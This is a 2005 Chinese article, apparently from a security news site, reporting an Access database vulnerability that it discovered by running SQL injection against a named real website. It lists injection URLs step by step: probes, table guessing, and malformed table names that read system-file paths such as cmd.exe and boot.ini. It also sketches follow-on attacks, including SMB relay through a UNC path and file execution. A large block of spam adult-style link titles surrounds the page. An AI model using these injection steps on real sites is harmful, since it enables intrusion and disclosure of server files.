国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關(guān)注微信公眾號(hào)

access數(shù)據(jù)庫跨文件查詢漏洞的初步報(bào)告
2005-12-17   

一. 在一次玩sql injection時(shí)無意發(fā)現(xiàn)了這個(gè)漏洞:
1.訪問http://www.lznet.net/news/displaynews.asp?id=24794'
頁面出錯(cuò)信息:
Microsoft OLE DB Provider for ODBC Drivers 錯(cuò)誤 '80040e14'
[Microsoft][ODBC Microsoft Access Driver] 字符串的語法錯(cuò)誤 在查詢表達(dá)式 'id = 24794'' 中。
/news/displaynews.asp,行133
2.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 1=1
頁面正常
3.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 1=2
頁面返回"找不到文件"
這是典型的sql injection with access漏洞,接下來猜表名:
4.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from news)
頁面出錯(cuò):數(shù)據(jù)庫引擎找不到輸入表或查詢 'news'
5.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from admin)
頁面出錯(cuò):數(shù)據(jù)庫引擎找不到輸入表或查詢 'admin'
6.突然想起了sql injection技術(shù)中得到的出錯(cuò)信息中表名格式為: news.id
其中news為表名,id為表中的一個(gè)列名
7.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from lznet.a)
出錯(cuò):找不到文件 'C:WINNTsystem32lznet.mdb'。
8.試遍了web根目錄以及所有知道的虛擬目錄,都下載不到這個(gè)lznet.mdb,仔細(xì)一看原來是lznet.mdb這個(gè)文件名是自己定義的。但是,是什么原因泄露系統(tǒng)目錄的物理路徑呢?繼續(xù)試試能不能查詢c:winntsystem32下的cmd.exe文件.
9.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from cmd.exe.a)
這條語句格式是經(jīng)過多次試驗(yàn)得到的:)
出錯(cuò):"數(shù)據(jù)庫引擎打不開文件'C:WINNTsystem32CMD.EXE'。 它已經(jīng)被別的用戶以獨(dú)占方式打開,或沒有查看數(shù)據(jù)的權(quán)限。 "
分析以上出錯(cuò)信息,我想權(quán)限是有的,因?yàn)槲覀兪腔赼sp的guest權(quán)限,默認(rèn)cmd.exe是Everyone:R ,如果打不開那就是數(shù)據(jù)庫不支持了,但是文件夾是可以被數(shù)據(jù)庫訪問,否則我們是搜索不到其中的文件的。
10.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from c:cmd.exe.a)
在這里我們可以看到跨目錄查詢是可行的
出錯(cuò):
找不到文件 'c:cmd.exe'。
11.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from c:oot.ini.a)
注:boot.ini是win2000在系統(tǒng)盤根目錄下的系統(tǒng)引導(dǎo)文件
出錯(cuò):
據(jù)庫引擎打不開文件'c:oot.ini'。 它已經(jīng)被別的用戶以獨(dú)占方式打開,或沒有查看數(shù)據(jù)的權(quán)限。
12.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from d:oot.ini.a)
跨盤符查詢也是可行的
出錯(cuò):
找不到文件 'd:oot.ini'。
13.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from i:oot.ini.a)
出錯(cuò):
'i:oot.ini'不是一個(gè)有效的路徑。 確定路徑名稱拼寫是否正確,以及是否連接到文件存放的服務(wù)器。
注:我們看到出錯(cuò)信息很老實(shí)的告訴了我們這個(gè)系統(tǒng)沒有i盤,從側(cè)面說access的出錯(cuò)信息在某些方面還是比較詳細(xì)的。
14.這是個(gè)比較實(shí)際的利用,如果對(duì)方是從spx打到spx,在winnt目錄下就會(huì)有這些文件,我們可以通過這個(gè)漏洞查找這些文件,確定目錄主機(jī)打補(bǔ)丁的情況:
[$NtUninstallQ329553$] [$NtUninstallQ329834$]
[$NtUninstallQ331953$] [$NtUninstallQ810833$]
[$NtUninstallQ811114$] [$NtUninstallQ811493$]
[$NtUninstallQ815021$] [$NtUninstallSP2SRP1$]
……………
二.漏洞的利用設(shè)想:
1.查詢某個(gè)動(dòng)態(tài)網(wǎng)頁文件,利用查詢語句獲取動(dòng)態(tài)網(wǎng)頁的源代碼,比如讀取文件內(nèi)容并把內(nèi)容寫入到表的一個(gè)列里,然后用len暴力猜列里的內(nèi)容,從而得到源碼。
2.猜測(cè)目錄的位置、文件名等等,了解對(duì)方的一點(diǎn)主機(jī)信息,比如說系統(tǒng)安裝在哪個(gè)分區(qū)上,共有幾個(gè)分區(qū)以及系統(tǒng)打的什么補(bǔ)丁等等。
3.查詢unc路徑,如\1.1.1.1sharea.vbs,而\1.1.1.1運(yùn)行著smbrelay,我們利用smb重定向技術(shù)有能會(huì)得到一個(gè)guest權(quán)限的ipc連接,這就有意思多了。
4.查找敏感文件,比如*.cif,*.mdb等等,但是我沒有實(shí)現(xiàn)在access上使用通配符查詢文件,可能是因?yàn)槲沂菙?shù)據(jù)庫新手的問題。
5.執(zhí)行文件,可以的話就發(fā)財(cái)了.
6.以上設(shè)想可能有理解錯(cuò)誤正在驗(yàn)證中(你想到什么就告訴我吧)
有關(guān)我對(duì)這個(gè)漏洞的理解:
access對(duì)表和列的查詢存在問題,如果我們構(gòu)造一個(gè)畸型表名的話,access找不到這樣的表就會(huì)當(dāng)成mdb文件去查找,如果構(gòu)造得當(dāng),就會(huì)當(dāng)成一個(gè)文件去到硬盤上查找!(默認(rèn)在system32下查找。我在sql server也簡(jiǎn)單測(cè)試了一下,沒有發(fā)現(xiàn)這個(gè)問題。另外利用這個(gè)漏洞需要兩個(gè)條件(怕有的人不理解):
(1)對(duì)方是asp+access應(yīng)用體系,并且asp代碼存在過濾不足的問題使我們可以遠(yuǎn)程注射sql語句。
(2)asp要能顯示查詢失敗的詳細(xì)信息,比如"數(shù)據(jù)庫引擎找不到輸入表或查詢 'news'"。否則我們無論查詢是否成功都變的沒有意義。

熱詞搜索:

上一篇:Discuz論壇短消息未限制發(fā)送次數(shù)漏洞
下一篇:暴庫入侵OBLOG!

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
中文国产一区| 韩国免费一区| 亚洲欧美日韩中文播放| 亚洲欧美日韩国产另类专区| 一本色道久久综合亚洲精品不| 国产精品久久久久一区二区| 国产视频久久久久| 在线日韩一区二区| 在线亚洲伦理| 久久亚洲国产精品一区二区 | 亚洲一区二区三区精品在线| 亚洲欧美日韩国产综合在线| 另类av导航| 国产一区二区三区电影在线观看| 99re成人精品视频| 久久久久国产精品人| 欧美涩涩网站| 日韩网站在线看片你懂的| 久久久久久久久久码影片| 欧美亚男人的天堂| 国产精品自在线| 在线一区二区三区四区五区| 欧美成人激情在线| 欧美婷婷久久| 亚洲欧美日本在线| 国产亚洲欧美一区在线观看| 亚洲手机在线| 久久九九国产| 黄色av成人| 久久久久久网| 亚洲国产天堂久久综合| 久久另类ts人妖一区二区| 国产日韩欧美亚洲一区| 亚洲自拍偷拍一区| 国产亚洲精品自拍| 欧美1区2区3区| 午夜欧美理论片| 国产婷婷色一区二区三区| 久久er精品视频| 亚洲伦理在线观看| 国产精品久99| 欧美成人精品福利| 亚洲欧美另类综合偷拍| 久久人人爽人人| 在线观看视频免费一区二区三区| 欧美r片在线| 欧美一级在线视频| 亚洲黄色av| 国产精品久久久久久久7电影| 欧美怡红院视频一区二区三区| 国产一区二区三区久久 | 中日韩午夜理伦电影免费| 久久亚洲色图| 亚洲一区二区三区高清| 国内成人精品一区| 欧美理论在线| 久久亚洲高清| 蜜桃av一区二区在线观看| 亚洲免费视频成人| 伊人久久婷婷| 加勒比av一区二区| 国产日韩在线看片| 国产精自产拍久久久久久| 欧美日韩一区二区免费视频| 蜜桃av综合| 欧美日本高清| 欧美体内she精视频在线观看| 裸体一区二区三区| 久久精品国产在热久久| 久久久综合精品| 牛牛精品成人免费视频| 美女精品一区| 欧美日韩色婷婷| 国产欧美一二三区| 亚洲国产视频一区| 一本一本大道香蕉久在线精品| 亚洲视频专区在线| 久久综合伊人77777蜜臀| 欧美电影在线免费观看网站| 欧美专区日韩视频| 欧美va天堂va视频va在线| 国产精品成人一区| 狠狠色噜噜狠狠色综合久| 99视频精品全国免费| 性一交一乱一区二区洋洋av| 狂野欧美一区| 国内精品久久久| 亚洲制服少妇| 欧美精品一区二| 亚洲精品一区二区三区不| 欧美在线视频观看| 国产精品丝袜xxxxxxx| 亚洲三级色网| 欧美日韩裸体免费视频| 亚洲激情视频| 欧美国产大片| 艳妇臀荡乳欲伦亚洲一区| 欧美日韩精品系列| 中文一区字幕| 国产欧美一区二区精品性| 亚洲欧美不卡| 国产乱码精品| 老司机精品视频网站| 亚洲电影免费| 国产精品狼人久久影院观看方式| 欧美中在线观看| 一区二区视频欧美| 国产精品热久久久久夜色精品三区| 极品尤物av久久免费看| 麻豆久久精品| 亚洲人成亚洲人成在线观看| 久久精品国产精品亚洲综合| 国产亚洲一区二区精品| 久久综合九色欧美综合狠狠| 在线观看日韩国产| 欧美jizzhd精品欧美巨大免费| 亚洲一二三四区| 日韩视频一区二区在线观看| 国产精品久久久久一区| 欧美精品在线观看91| 久久永久免费| 麻豆成人在线观看| 欧美激情一二区| 国产精自产拍久久久久久蜜| 激情六月综合| 久久久91精品国产一区二区精品| 亚洲五月六月| 欧美激情一区二区三区成人 | 欧美精品一区在线发布| 欧美影院一区| 午夜精品视频在线| 久久久www| 欧美精品综合| 国产精品亚洲а∨天堂免在线| 欧美成人tv| 国产精品日韩欧美一区二区| 久久综合999| 欧美—级a级欧美特级ar全黄| 久久综合九色九九| 欧美国产日韩一区| 欧美视频国产精品| 国产一区二区三区久久| 亚洲毛片在线观看| 久久久久国产精品厨房| 欧美日韩1区| 欧美女人交a| 亚洲经典自拍| 欧美黑人多人双交| 欧美精品一区在线| 欧美三级午夜理伦三级中文幕| 欧美日韩国产大片| 国产伦精品一区二区三区视频孕妇| 国产精品久久久久久久久婷婷 | 欧美日韩另类综合| 欧美三日本三级少妇三2023| 国产欧美一区二区精品秋霞影院| 一区福利视频| 亚洲欧美久久久久一区二区三区| 久久国产毛片| 欧美视频观看一区| 亚洲欧洲在线一区| 久久久免费精品视频| 欧美日韩中字| 亚洲精品乱码久久久久久久久| 亚洲一区二区成人| 欧美色欧美亚洲另类七区| 亚洲国产午夜| 久久青草欧美一区二区三区| 国产老肥熟一区二区三区| 亚洲一区二区精品视频| 欧美精品v国产精品v日韩精品 | 日韩一级精品| 久久人91精品久久久久久不卡| 国产精品久久久久aaaa| 亚洲性图久久| 国产嫩草影院久久久久 | 亚洲欧美制服另类日韩| 欧美三级电影一区| 亚洲女同在线| 国产精品免费视频观看| 亚洲一区二区三区涩| 欧美色综合天天久久综合精品| 亚洲精品在线观看免费| 欧美激情一区在线观看| 亚洲视频精选在线| 国产在线视频欧美一区二区三区| 久久久精品性| 夜夜嗨av色综合久久久综合网| 国产精品亚洲一区二区三区在线| 欧美一区免费视频| 亚洲精品孕妇| 狠狠综合久久av一区二区老牛| 噜噜爱69成人精品| 亚洲午夜精品网| 亚洲经典在线| 在线日韩av片| 国内精品久久久久影院色| 欧美日韩国产精品专区| 欧美一区三区二区在线观看| 日韩亚洲欧美成人一区|